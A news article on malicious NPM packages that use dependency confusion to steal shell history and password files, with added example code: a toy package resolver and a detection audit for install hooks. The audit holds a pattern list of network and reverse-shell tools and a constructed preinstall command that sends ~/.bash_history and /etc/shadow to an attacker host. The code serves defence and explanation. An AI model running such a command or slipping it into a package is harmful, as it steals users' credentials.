Security researchers have discovered new malicious NPM packages that impersonate internal code used by Amazon, Slack, Zillow, and Lyft and that can steal Linux and Unix password and shell-history files. Experts also stated that the packages can open reverse shells back to the attackers.
According to Bleeping Computer's latest report, the technique these packages rely on, dependency confusion, was first disclosed by Alex Birsan, the security researcher who earned bug bounties from 35 companies by exploiting a weakness in how open-source development tools resolve package names.
IT Pro reported that the malicious code was found in JavaScript packages published to the NPM registry. Once installed, it lets attackers collect sensitive files from Unix and Linux systems.
Sonatype, a software supply-chain security firm, said that the NPM packages carry dependency confusion payloads and that they target the names of internal components used by companies such as Amazon, Slack, Lyft, and Zillow.
How the new NPM packages attack
The malicious NPM packages include lyft-dataset-sdk, serverless-slack-app, zg-rentals, and amzn. Dependency confusion works because package managers that draw on public registries such as PyPI, RubyGems, and NPM may, when an application declares a dependency by name alone, fetch a same-named package from the public registry instead of the company's internal package, typically because the public copy carries a higher version number.
Security researchers explained that this dependency confusion weakness lets attackers inject their own code into an internal application during the build, a supply-chain attack that requires no access to the company's network, only knowledge of an internal package name.
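The resolution behaviour described above, as an added example that is not code from the article, from Sonatype, or from Birsan's research: a miniature model of a package manager that consults a private registry and the public one and keeps the highest version satisfying the declared range, beside the scoped configuration that removes the public registry from the candidate set. The registry snapshots, the package names (acme-billing-sdk, @acme/billing-sdk) and the version numbers are constructed, and range support is deliberately limited to "*" and caret ranges.

```javascript
// Added example (not the article's or Sonatype's code): a toy resolver showing why an
// attacker-published public package with the same name as an internal one wins, and
// how scoping the name to a registry prevents it. Names and versions are constructed.

function parseVersion(v) {
  const parts = v.split('.').map(Number);
  if (parts.length !== 3 || parts.some(Number.isNaN)) {
    throw new Error(`unsupported version string: ${v}`);
  }
  return parts;
}

// Comparator over major.minor.patch: negative, zero or positive.
function compareVersions(a, b) {
  const pa = parseVersion(a), pb = parseVersion(b);
  for (let i = 0; i < 3; i++) if (pa[i] !== pb[i]) return pa[i] - pb[i];
  return 0;
}

// Minimal range support: "*" matches anything, "^X.Y.Z" matches the same major at or
// above X.Y.Z (the common case for major >= 1; the 0.x special cases are omitted).
function satisfies(range, version) {
  if (range === '*') return true;
  if (range.startsWith('^')) {
    const base = range.slice(1);
    return parseVersion(version)[0] === parseVersion(base)[0] &&
      compareVersions(version, base) >= 0;
  }
  throw new Error(`unsupported range: ${range}`);
}

// Constructed registry snapshots. The public "acme-billing-sdk" entry plays the role of
// the attacker's upload: same name as the internal package, higher version number.
const registries = {
  private: {
    'acme-billing-sdk': ['1.4.0', '1.4.2'],
    '@acme/billing-sdk': ['1.4.0', '1.4.2'],
  },
  public: {
    'acme-billing-sdk': ['1.99.0'],
    'left-pad-ish': ['1.0.0'],
  },
};

// Naive resolution: every configured registry is a candidate source and the highest
// satisfying version wins, wherever it came from. This is the confusable behaviour.
function resolveNaive(name, range, regs) {
  let best = null;
  for (const [regName, reg] of Object.entries(regs)) {
    for (const v of (reg && reg[name]) || []) {
      if (satisfies(range, v) && (best === null || compareVersions(v, best.version) > 0)) {
        best = { version: v, registry: regName };
      }
    }
  }
  return best;
}

// Scoped resolution: an .npmrc-style map routes a scope to exactly one registry, so
// "@acme/*" is only ever looked up privately. Unscoped names still go to the public
// registry, which is why renaming the internal package matters as much as the config.
function resolveScoped(name, range, regs, scopeMap) {
  const scope = name.startsWith('@') ? name.split('/')[0] : null;
  const regName = scope && scopeMap[scope] ? scopeMap[scope] : 'public';
  return resolveNaive(name, range, { [regName]: regs[regName] });
}

// Pre-flight check for an application manifest: unscoped dependency names are the ones
// an attacker can claim on the public registry, so list them for review.
function unscopedDependencies(manifest) {
  const deps = { ...(manifest.dependencies || {}), ...(manifest.devDependencies || {}) };
  return Object.keys(deps).filter((n) => !n.startsWith('@'));
}
```

With these snapshots, resolving `acme-billing-sdk` against `^1.4.0` returns the public 1.99.0 even though a perfectly good 1.4.2 exists privately, because the caret range still admits it; resolving `@acme/billing-sdk` with the scope pinned to the private registry returns 1.4.2. The last function is the audit a build team can run over its own package.json before an attacker does the same with a leaked copy.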
"I was starting to wonder when we were going to see a malicious actor take advantage of the current situation. Finally, we've spotted one," said Juan Aguirre, a Sonatype security researcher, via Bleeping Computer.
"There is no scenario I can imagine where I'm going to submit a PoC for a bug bounty program that actually harms the organization. Taking their /etc/shadow file is definitely harmful," he added.
Malicious NPM packages' main target
Security experts said that the malicious NPM packages' main target is the ".bash_history" file in users' Linux home directories. Once a package has read this file, it sends the contents to a remote host under the attackers' control. The file is valuable because it records every command typed in the shell, including any passwords passed as command-line arguments or pasted in as plain text.
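A detection check for the behaviour described above, added here as an example that is not code from the article or from Sonatype: it audits the lifecycle scripts in a package.json (the hooks NPM runs automatically at install time) for references to credential or shell-history files, network egress, reverse-shell idioms, and inline code execution. The two manifests are constructed; the suspicious one imitates the read-and-exfiltrate pattern the article describes and does not reproduce any real package, and the host name uses the reserved .invalid domain.

```javascript
// Added example (not the article's or Sonatype's code): flag npm install hooks that
// read shell history or password files or ship data off the machine. Manifests below
// are constructed for illustration.

// Scripts npm runs without the user asking for them; "test" or "build" are not here.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare', 'prepublish'];

const RULES = [
  { id: 'sensitive-file', why: 'references a credential or shell-history file',
    patterns: [/\/etc\/shadow/, /\/etc\/passwd/, /\.bash_history/, /\.zsh_history/, /\.ssh\//, /\.npmrc/] },
  { id: 'network-egress', why: 'contacts a remote host from an install hook',
    patterns: [/\bcurl\b/, /\bwget\b/, /\bnc\b/, /\bncat\b/, /\/dev\/tcp\//, /https?:\/\//] },
  { id: 'reverse-shell', why: 'looks like an interactive shell bound to a socket',
    patterns: [/\bbash -i\b/, /\bnc\b[^|;&]*-e\b/, /\/dev\/tcp\//] },
  { id: 'inline-eval', why: 'runs inline code at install time',
    patterns: [/\bnode -e\b/, /\bsh -c\b/, /\bbash -c\b/, /\bpython[23]? -c\b/] },
];

// Returns one finding per (hook, rule) pair that matched; an empty array means clean.
function auditManifest(manifest) {
  const findings = [];
  const scripts = manifest.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== 'string') continue;
    for (const rule of RULES) {
      if (rule.patterns.some((re) => re.test(cmd))) {
        findings.push({ package: manifest.name, hook, rule: rule.id, why: rule.why, command: cmd });
      }
    }
  }
  return findings;
}

// Constructed manifest imitating the behaviour the article describes: read the shell
// history and password file in a preinstall hook and POST them to a remote host.
const suspiciousManifest = {
  name: 'example-internal-sdk',
  version: '99.0.0',
  scripts: {
    preinstall: 'cat ~/.bash_history /etc/shadow | curl -s -X POST --data-binary @- http://attacker.invalid/collect',
  },
};

// Constructed benign manifest: a native build step in postinstall, and a curl that only
// appears under "test", which npm does not run at install time.
const benignManifest = {
  name: 'example-cli',
  version: '1.2.3',
  scripts: {
    postinstall: 'node scripts/build-native.js',
    test: 'curl http://localhost:8080/health',
  },
};
```

Running `auditManifest` on the suspicious manifest yields two findings on the preinstall hook, sensitive-file and network-egress; the benign manifest yields none, because its curl lives in a script npm never runs on its own. A check like this belongs in CI before `npm install`, or as a review of `npm pack` output for every new dependency, and it is a complement to disabling hooks with `npm install --ignore-scripts`, not a substitute: pattern matching catches the obvious one-liner and will miss code that hides the same behaviour in a required module.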
This article is owned by TechTimes.
Written by: Giuliano de Leon.